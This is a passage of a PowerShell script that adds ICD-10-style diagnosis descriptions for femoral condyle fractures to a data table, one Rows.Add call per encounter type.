IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of left femur","Displaced unspecified condyle fracture of lower end of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of left femur","Displaced unspecified condyle fracture of lower end of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of left femur","Displaced unspecified condyle fracture of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of left femur","Displaced unspecified condyle fracture of lower end of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of unspecified femur","Displaced unspecified condyle fracture of lower end of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of unspecified femur","Displaced unspecified condyle fracture of lower end of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of unspecified femur","Displaced unspecified condyle fracture of lower end of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of unspecified femur","Displaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of unspecified femur","Displaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of unspecified femur","Displaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of unspecified femur","Displaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of unspecified femur","Displaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of unspecified femur","Displaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of unspecified femur","Displaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of unspecified femur","Displaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of unspecified femur","Displaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of unspecified femur","Displaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of unspecified femur","Displaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of unspecified femur","Displaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of unspecified femur","Displaced unspecified condyle fracture of lower end of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of right femur","Nondisplaced unspecified condyle fracture of lower end of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of right femur","Nondisplaced unspecified condyle fracture of lower end of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of right femur","Nondisplaced unspecified condyle fracture of lower end of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of right femur","Nondisplaced unspecified condyle fracture of lower end of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of right femur","Nondisplaced unspecified condyle fracture of lower end of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of right femur","Nondisplaced unspecified condyle fracture of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of right femur","Nondisplaced unspecified condyle fracture of lower end of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of right femur","Nondisplaced unspecified condyle fracture of lower end of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of right femur","Nondisplaced unspecified condyle fracture of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of right femur","Nondisplaced unspecified condyle fracture of lower end of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of right femur","Nondisplaced unspecified condyle fracture of lower end of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of right femur","Nondisplaced unspecified condyle fracture of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of right femur","Nondisplaced unspecified condyle fracture of lower end of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of right femur","Nondisplaced unspecified condyle fracture of lower end of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of right femur","Nondisplaced unspecified condyle fracture of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of right femur","Nondisplaced unspecified condyle fracture of lower end of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of left femur","Nondisplaced unspecified condyle fracture of lower end of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of left femur","Nondisplaced unspecified condyle fracture of lower end of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of left femur","Nondisplaced unspecified condyle fracture of lower end of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of left femur","Nondisplaced unspecified condyle fracture of lower end of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of left femur","Nondisplaced unspecified condyle fracture of lower end of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of left femur","Nondisplaced unspecified condyle fracture of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of left femur","Nondisplaced unspecified condyle fracture of lower end of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of left femur","Nondisplaced unspecified condyle fracture of lower end of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of left femur","Nondisplaced unspecified condyle fracture of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of left femur","Nondisplaced unspecified condyle fracture of lower end of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of left femur","Nondisplaced unspecified condyle fracture of lower end of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of left femur","Nondisplaced unspecified condyle fracture of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of left femur","Nondisplaced unspecified condyle fracture of lower end of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of left femur","Nondisplaced unspecified condyle fracture of lower end of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of left femur","Nondisplaced unspecified condyle fracture of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of left femur","Nondisplaced unspecified condyle fracture of lower end of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of unspecified femur","Nondisplaced unspecified condyle fracture of lower end of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of unspecified femur","Nondisplaced unspecified condyle fracture of lower end of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of unspecified femur","Nondisplaced unspecified condyle fracture of lower end of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of unspecified femur","Nondisplaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of unspecified femur","Nondisplaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of unspecified femur","Nondisplaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of unspecified femur","Nondisplaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of unspecified femur","Nondisplaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of unspecified femur","Nondisplaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of unspecified femur","Nondisplaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of unspecified femur","Nondisplaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of unspecified femur","Nondisplaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of unspecified femur","Nondisplaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of unspecified femur","Nondisplaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of unspecified femur","Nondisplaced unspecified condyle fracture of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified condyle fracture of lower end of unspecified femur","Nondisplaced unspecified condyle fracture of lower end of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right femur","Displaced fracture of lateral condyle of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right femur","Displaced fracture of lateral condyle of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right femur","Displaced fracture of lateral condyle of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right femur","Displaced fracture of lateral condyle of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right femur","Displaced fracture of lateral condyle of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right femur","Displaced fracture of lateral condyle of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right femur","Displaced fracture of lateral condyle of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right femur","Displaced fracture of lateral condyle of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right femur","Displaced fracture of lateral condyle of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right femur","Displaced fracture of lateral condyle of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right femur","Displaced fracture of lateral condyle of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right femur","Displaced fracture of lateral condyle of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right femur","Displaced fracture of lateral condyle of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right femur","Displaced fracture of lateral condyle of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right femur","Displaced fracture of lateral condyle of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right femur","Displaced fracture of lateral condyle of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left femur","Displaced fracture of lateral condyle of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left femur","Displaced fracture of lateral condyle of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left femur","Displaced fracture of lateral condyle of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left femur","Displaced fracture of lateral condyle of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left femur","Displaced fracture of lateral condyle of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left femur","Displaced fracture of lateral condyle of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left femur","Displaced fracture of lateral condyle of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left femur","Displaced fracture of lateral condyle of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left femur","Displaced fracture of lateral condyle of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left femur","Displaced fracture of lateral condyle of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left femur","Displaced fracture of lateral condyle of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left femur","Displaced fracture of lateral condyle of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left femur","Displaced fracture of lateral condyle of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left femur","Displaced fracture of lateral condyle of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left femur","Displaced fracture of lateral condyle of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left femur","Displaced fracture of lateral condyle of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified femur","Displaced fracture of lateral condyle of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified femur","Displaced fracture of lateral condyle of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified femur","Displaced fracture of lateral condyle of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified femur","Displaced fracture of lateral condyle of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified femur","Displaced fracture of lateral condyle of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified femur","Displaced fracture of lateral condyle of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified femur","Displaced fracture of lateral condyle of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified femur","Displaced fracture of lateral condyle of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified femur","Displaced fracture of lateral condyle of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified femur","Displaced fracture of lateral condyle of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified femur","Displaced fracture of lateral condyle of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified femur","Displaced fracture of lateral condyle of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified femur","Displaced fracture of lateral condyle of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified femur","Displaced fracture of lateral condyle of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified femur","Displaced fracture of lateral condyle of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified femur","Displaced fracture of lateral condyle of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right femur","Nondisplaced fracture of lateral condyle of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right femur","Nondisplaced fracture of lateral condyle of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right femur","Nondisplaced fracture of lateral condyle of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right femur","Nondisplaced fracture of lateral condyle of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right femur","Nondisplaced fracture of lateral condyle of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right femur","Nondisplaced fracture of lateral condyle of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right femur","Nondisplaced fracture of lateral condyle of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right femur","Nondisplaced fracture of lateral condyle of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right femur","Nondisplaced fracture of lateral condyle of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right femur","Nondisplaced fracture of lateral condyle of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right femur","Nondisplaced fracture of lateral condyle of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right femur","Nondisplaced fracture of lateral condyle of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right femur","Nondisplaced fracture of lateral condyle of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right femur","Nondisplaced fracture of lateral condyle of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right femur","Nondisplaced fracture of lateral condyle of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right femur","Nondisplaced fracture of lateral condyle of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left femur","Nondisplaced fracture of lateral condyle of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left femur","Nondisplaced fracture of lateral condyle of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left femur","Nondisplaced fracture of lateral condyle of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left femur","Nondisplaced fracture of lateral condyle of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left femur","Nondisplaced fracture of lateral condyle of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left femur","Nondisplaced fracture of lateral condyle of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left femur","Nondisplaced fracture of lateral condyle of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left femur","Nondisplaced fracture of lateral condyle of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left femur","Nondisplaced fracture of lateral condyle of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left femur","Nondisplaced fracture of lateral condyle of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left femur","Nondisplaced fracture of lateral condyle of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left femur","Nondisplaced fracture of lateral condyle of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left femur","Nondisplaced fracture of lateral condyle of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left femur","Nondisplaced fracture of lateral condyle of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left femur","Nondisplaced fracture of lateral condyle of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left femur","Nondisplaced fracture of lateral condyle of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified femur","Nondisplaced fracture of lateral condyle of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified femur","Nondisplaced fracture of lateral condyle of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified femur","Nondisplaced fracture of lateral condyle of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified femur","Nondisplaced fracture of lateral condyle of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified femur","Nondisplaced fracture of lateral condyle of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified femur","Nondisplaced fracture of lateral condyle of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified femur","Nondisplaced fracture of lateral condyle of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified femur","Nondisplaced fracture of lateral condyle of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified femur","Nondisplaced fracture of lateral condyle of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified femur","Nondisplaced fracture of lateral condyle of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified femur","Nondisplaced fracture of lateral condyle of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified femur","Nondisplaced fracture of lateral condyle of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified femur","Nondisplaced fracture of lateral condyle of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified femur","Nondisplaced fracture of lateral condyle of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified femur","Nondisplaced fracture of lateral condyle of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified femur","Nondisplaced fracture of lateral condyle of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right femur","Displaced fracture of medial condyle of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right femur","Displaced fracture of medial condyle of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right femur","Displaced fracture of medial condyle of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right femur","Displaced fracture of medial condyle of right femur, subsequent encounter for closed fracture with routine healing") + $null = 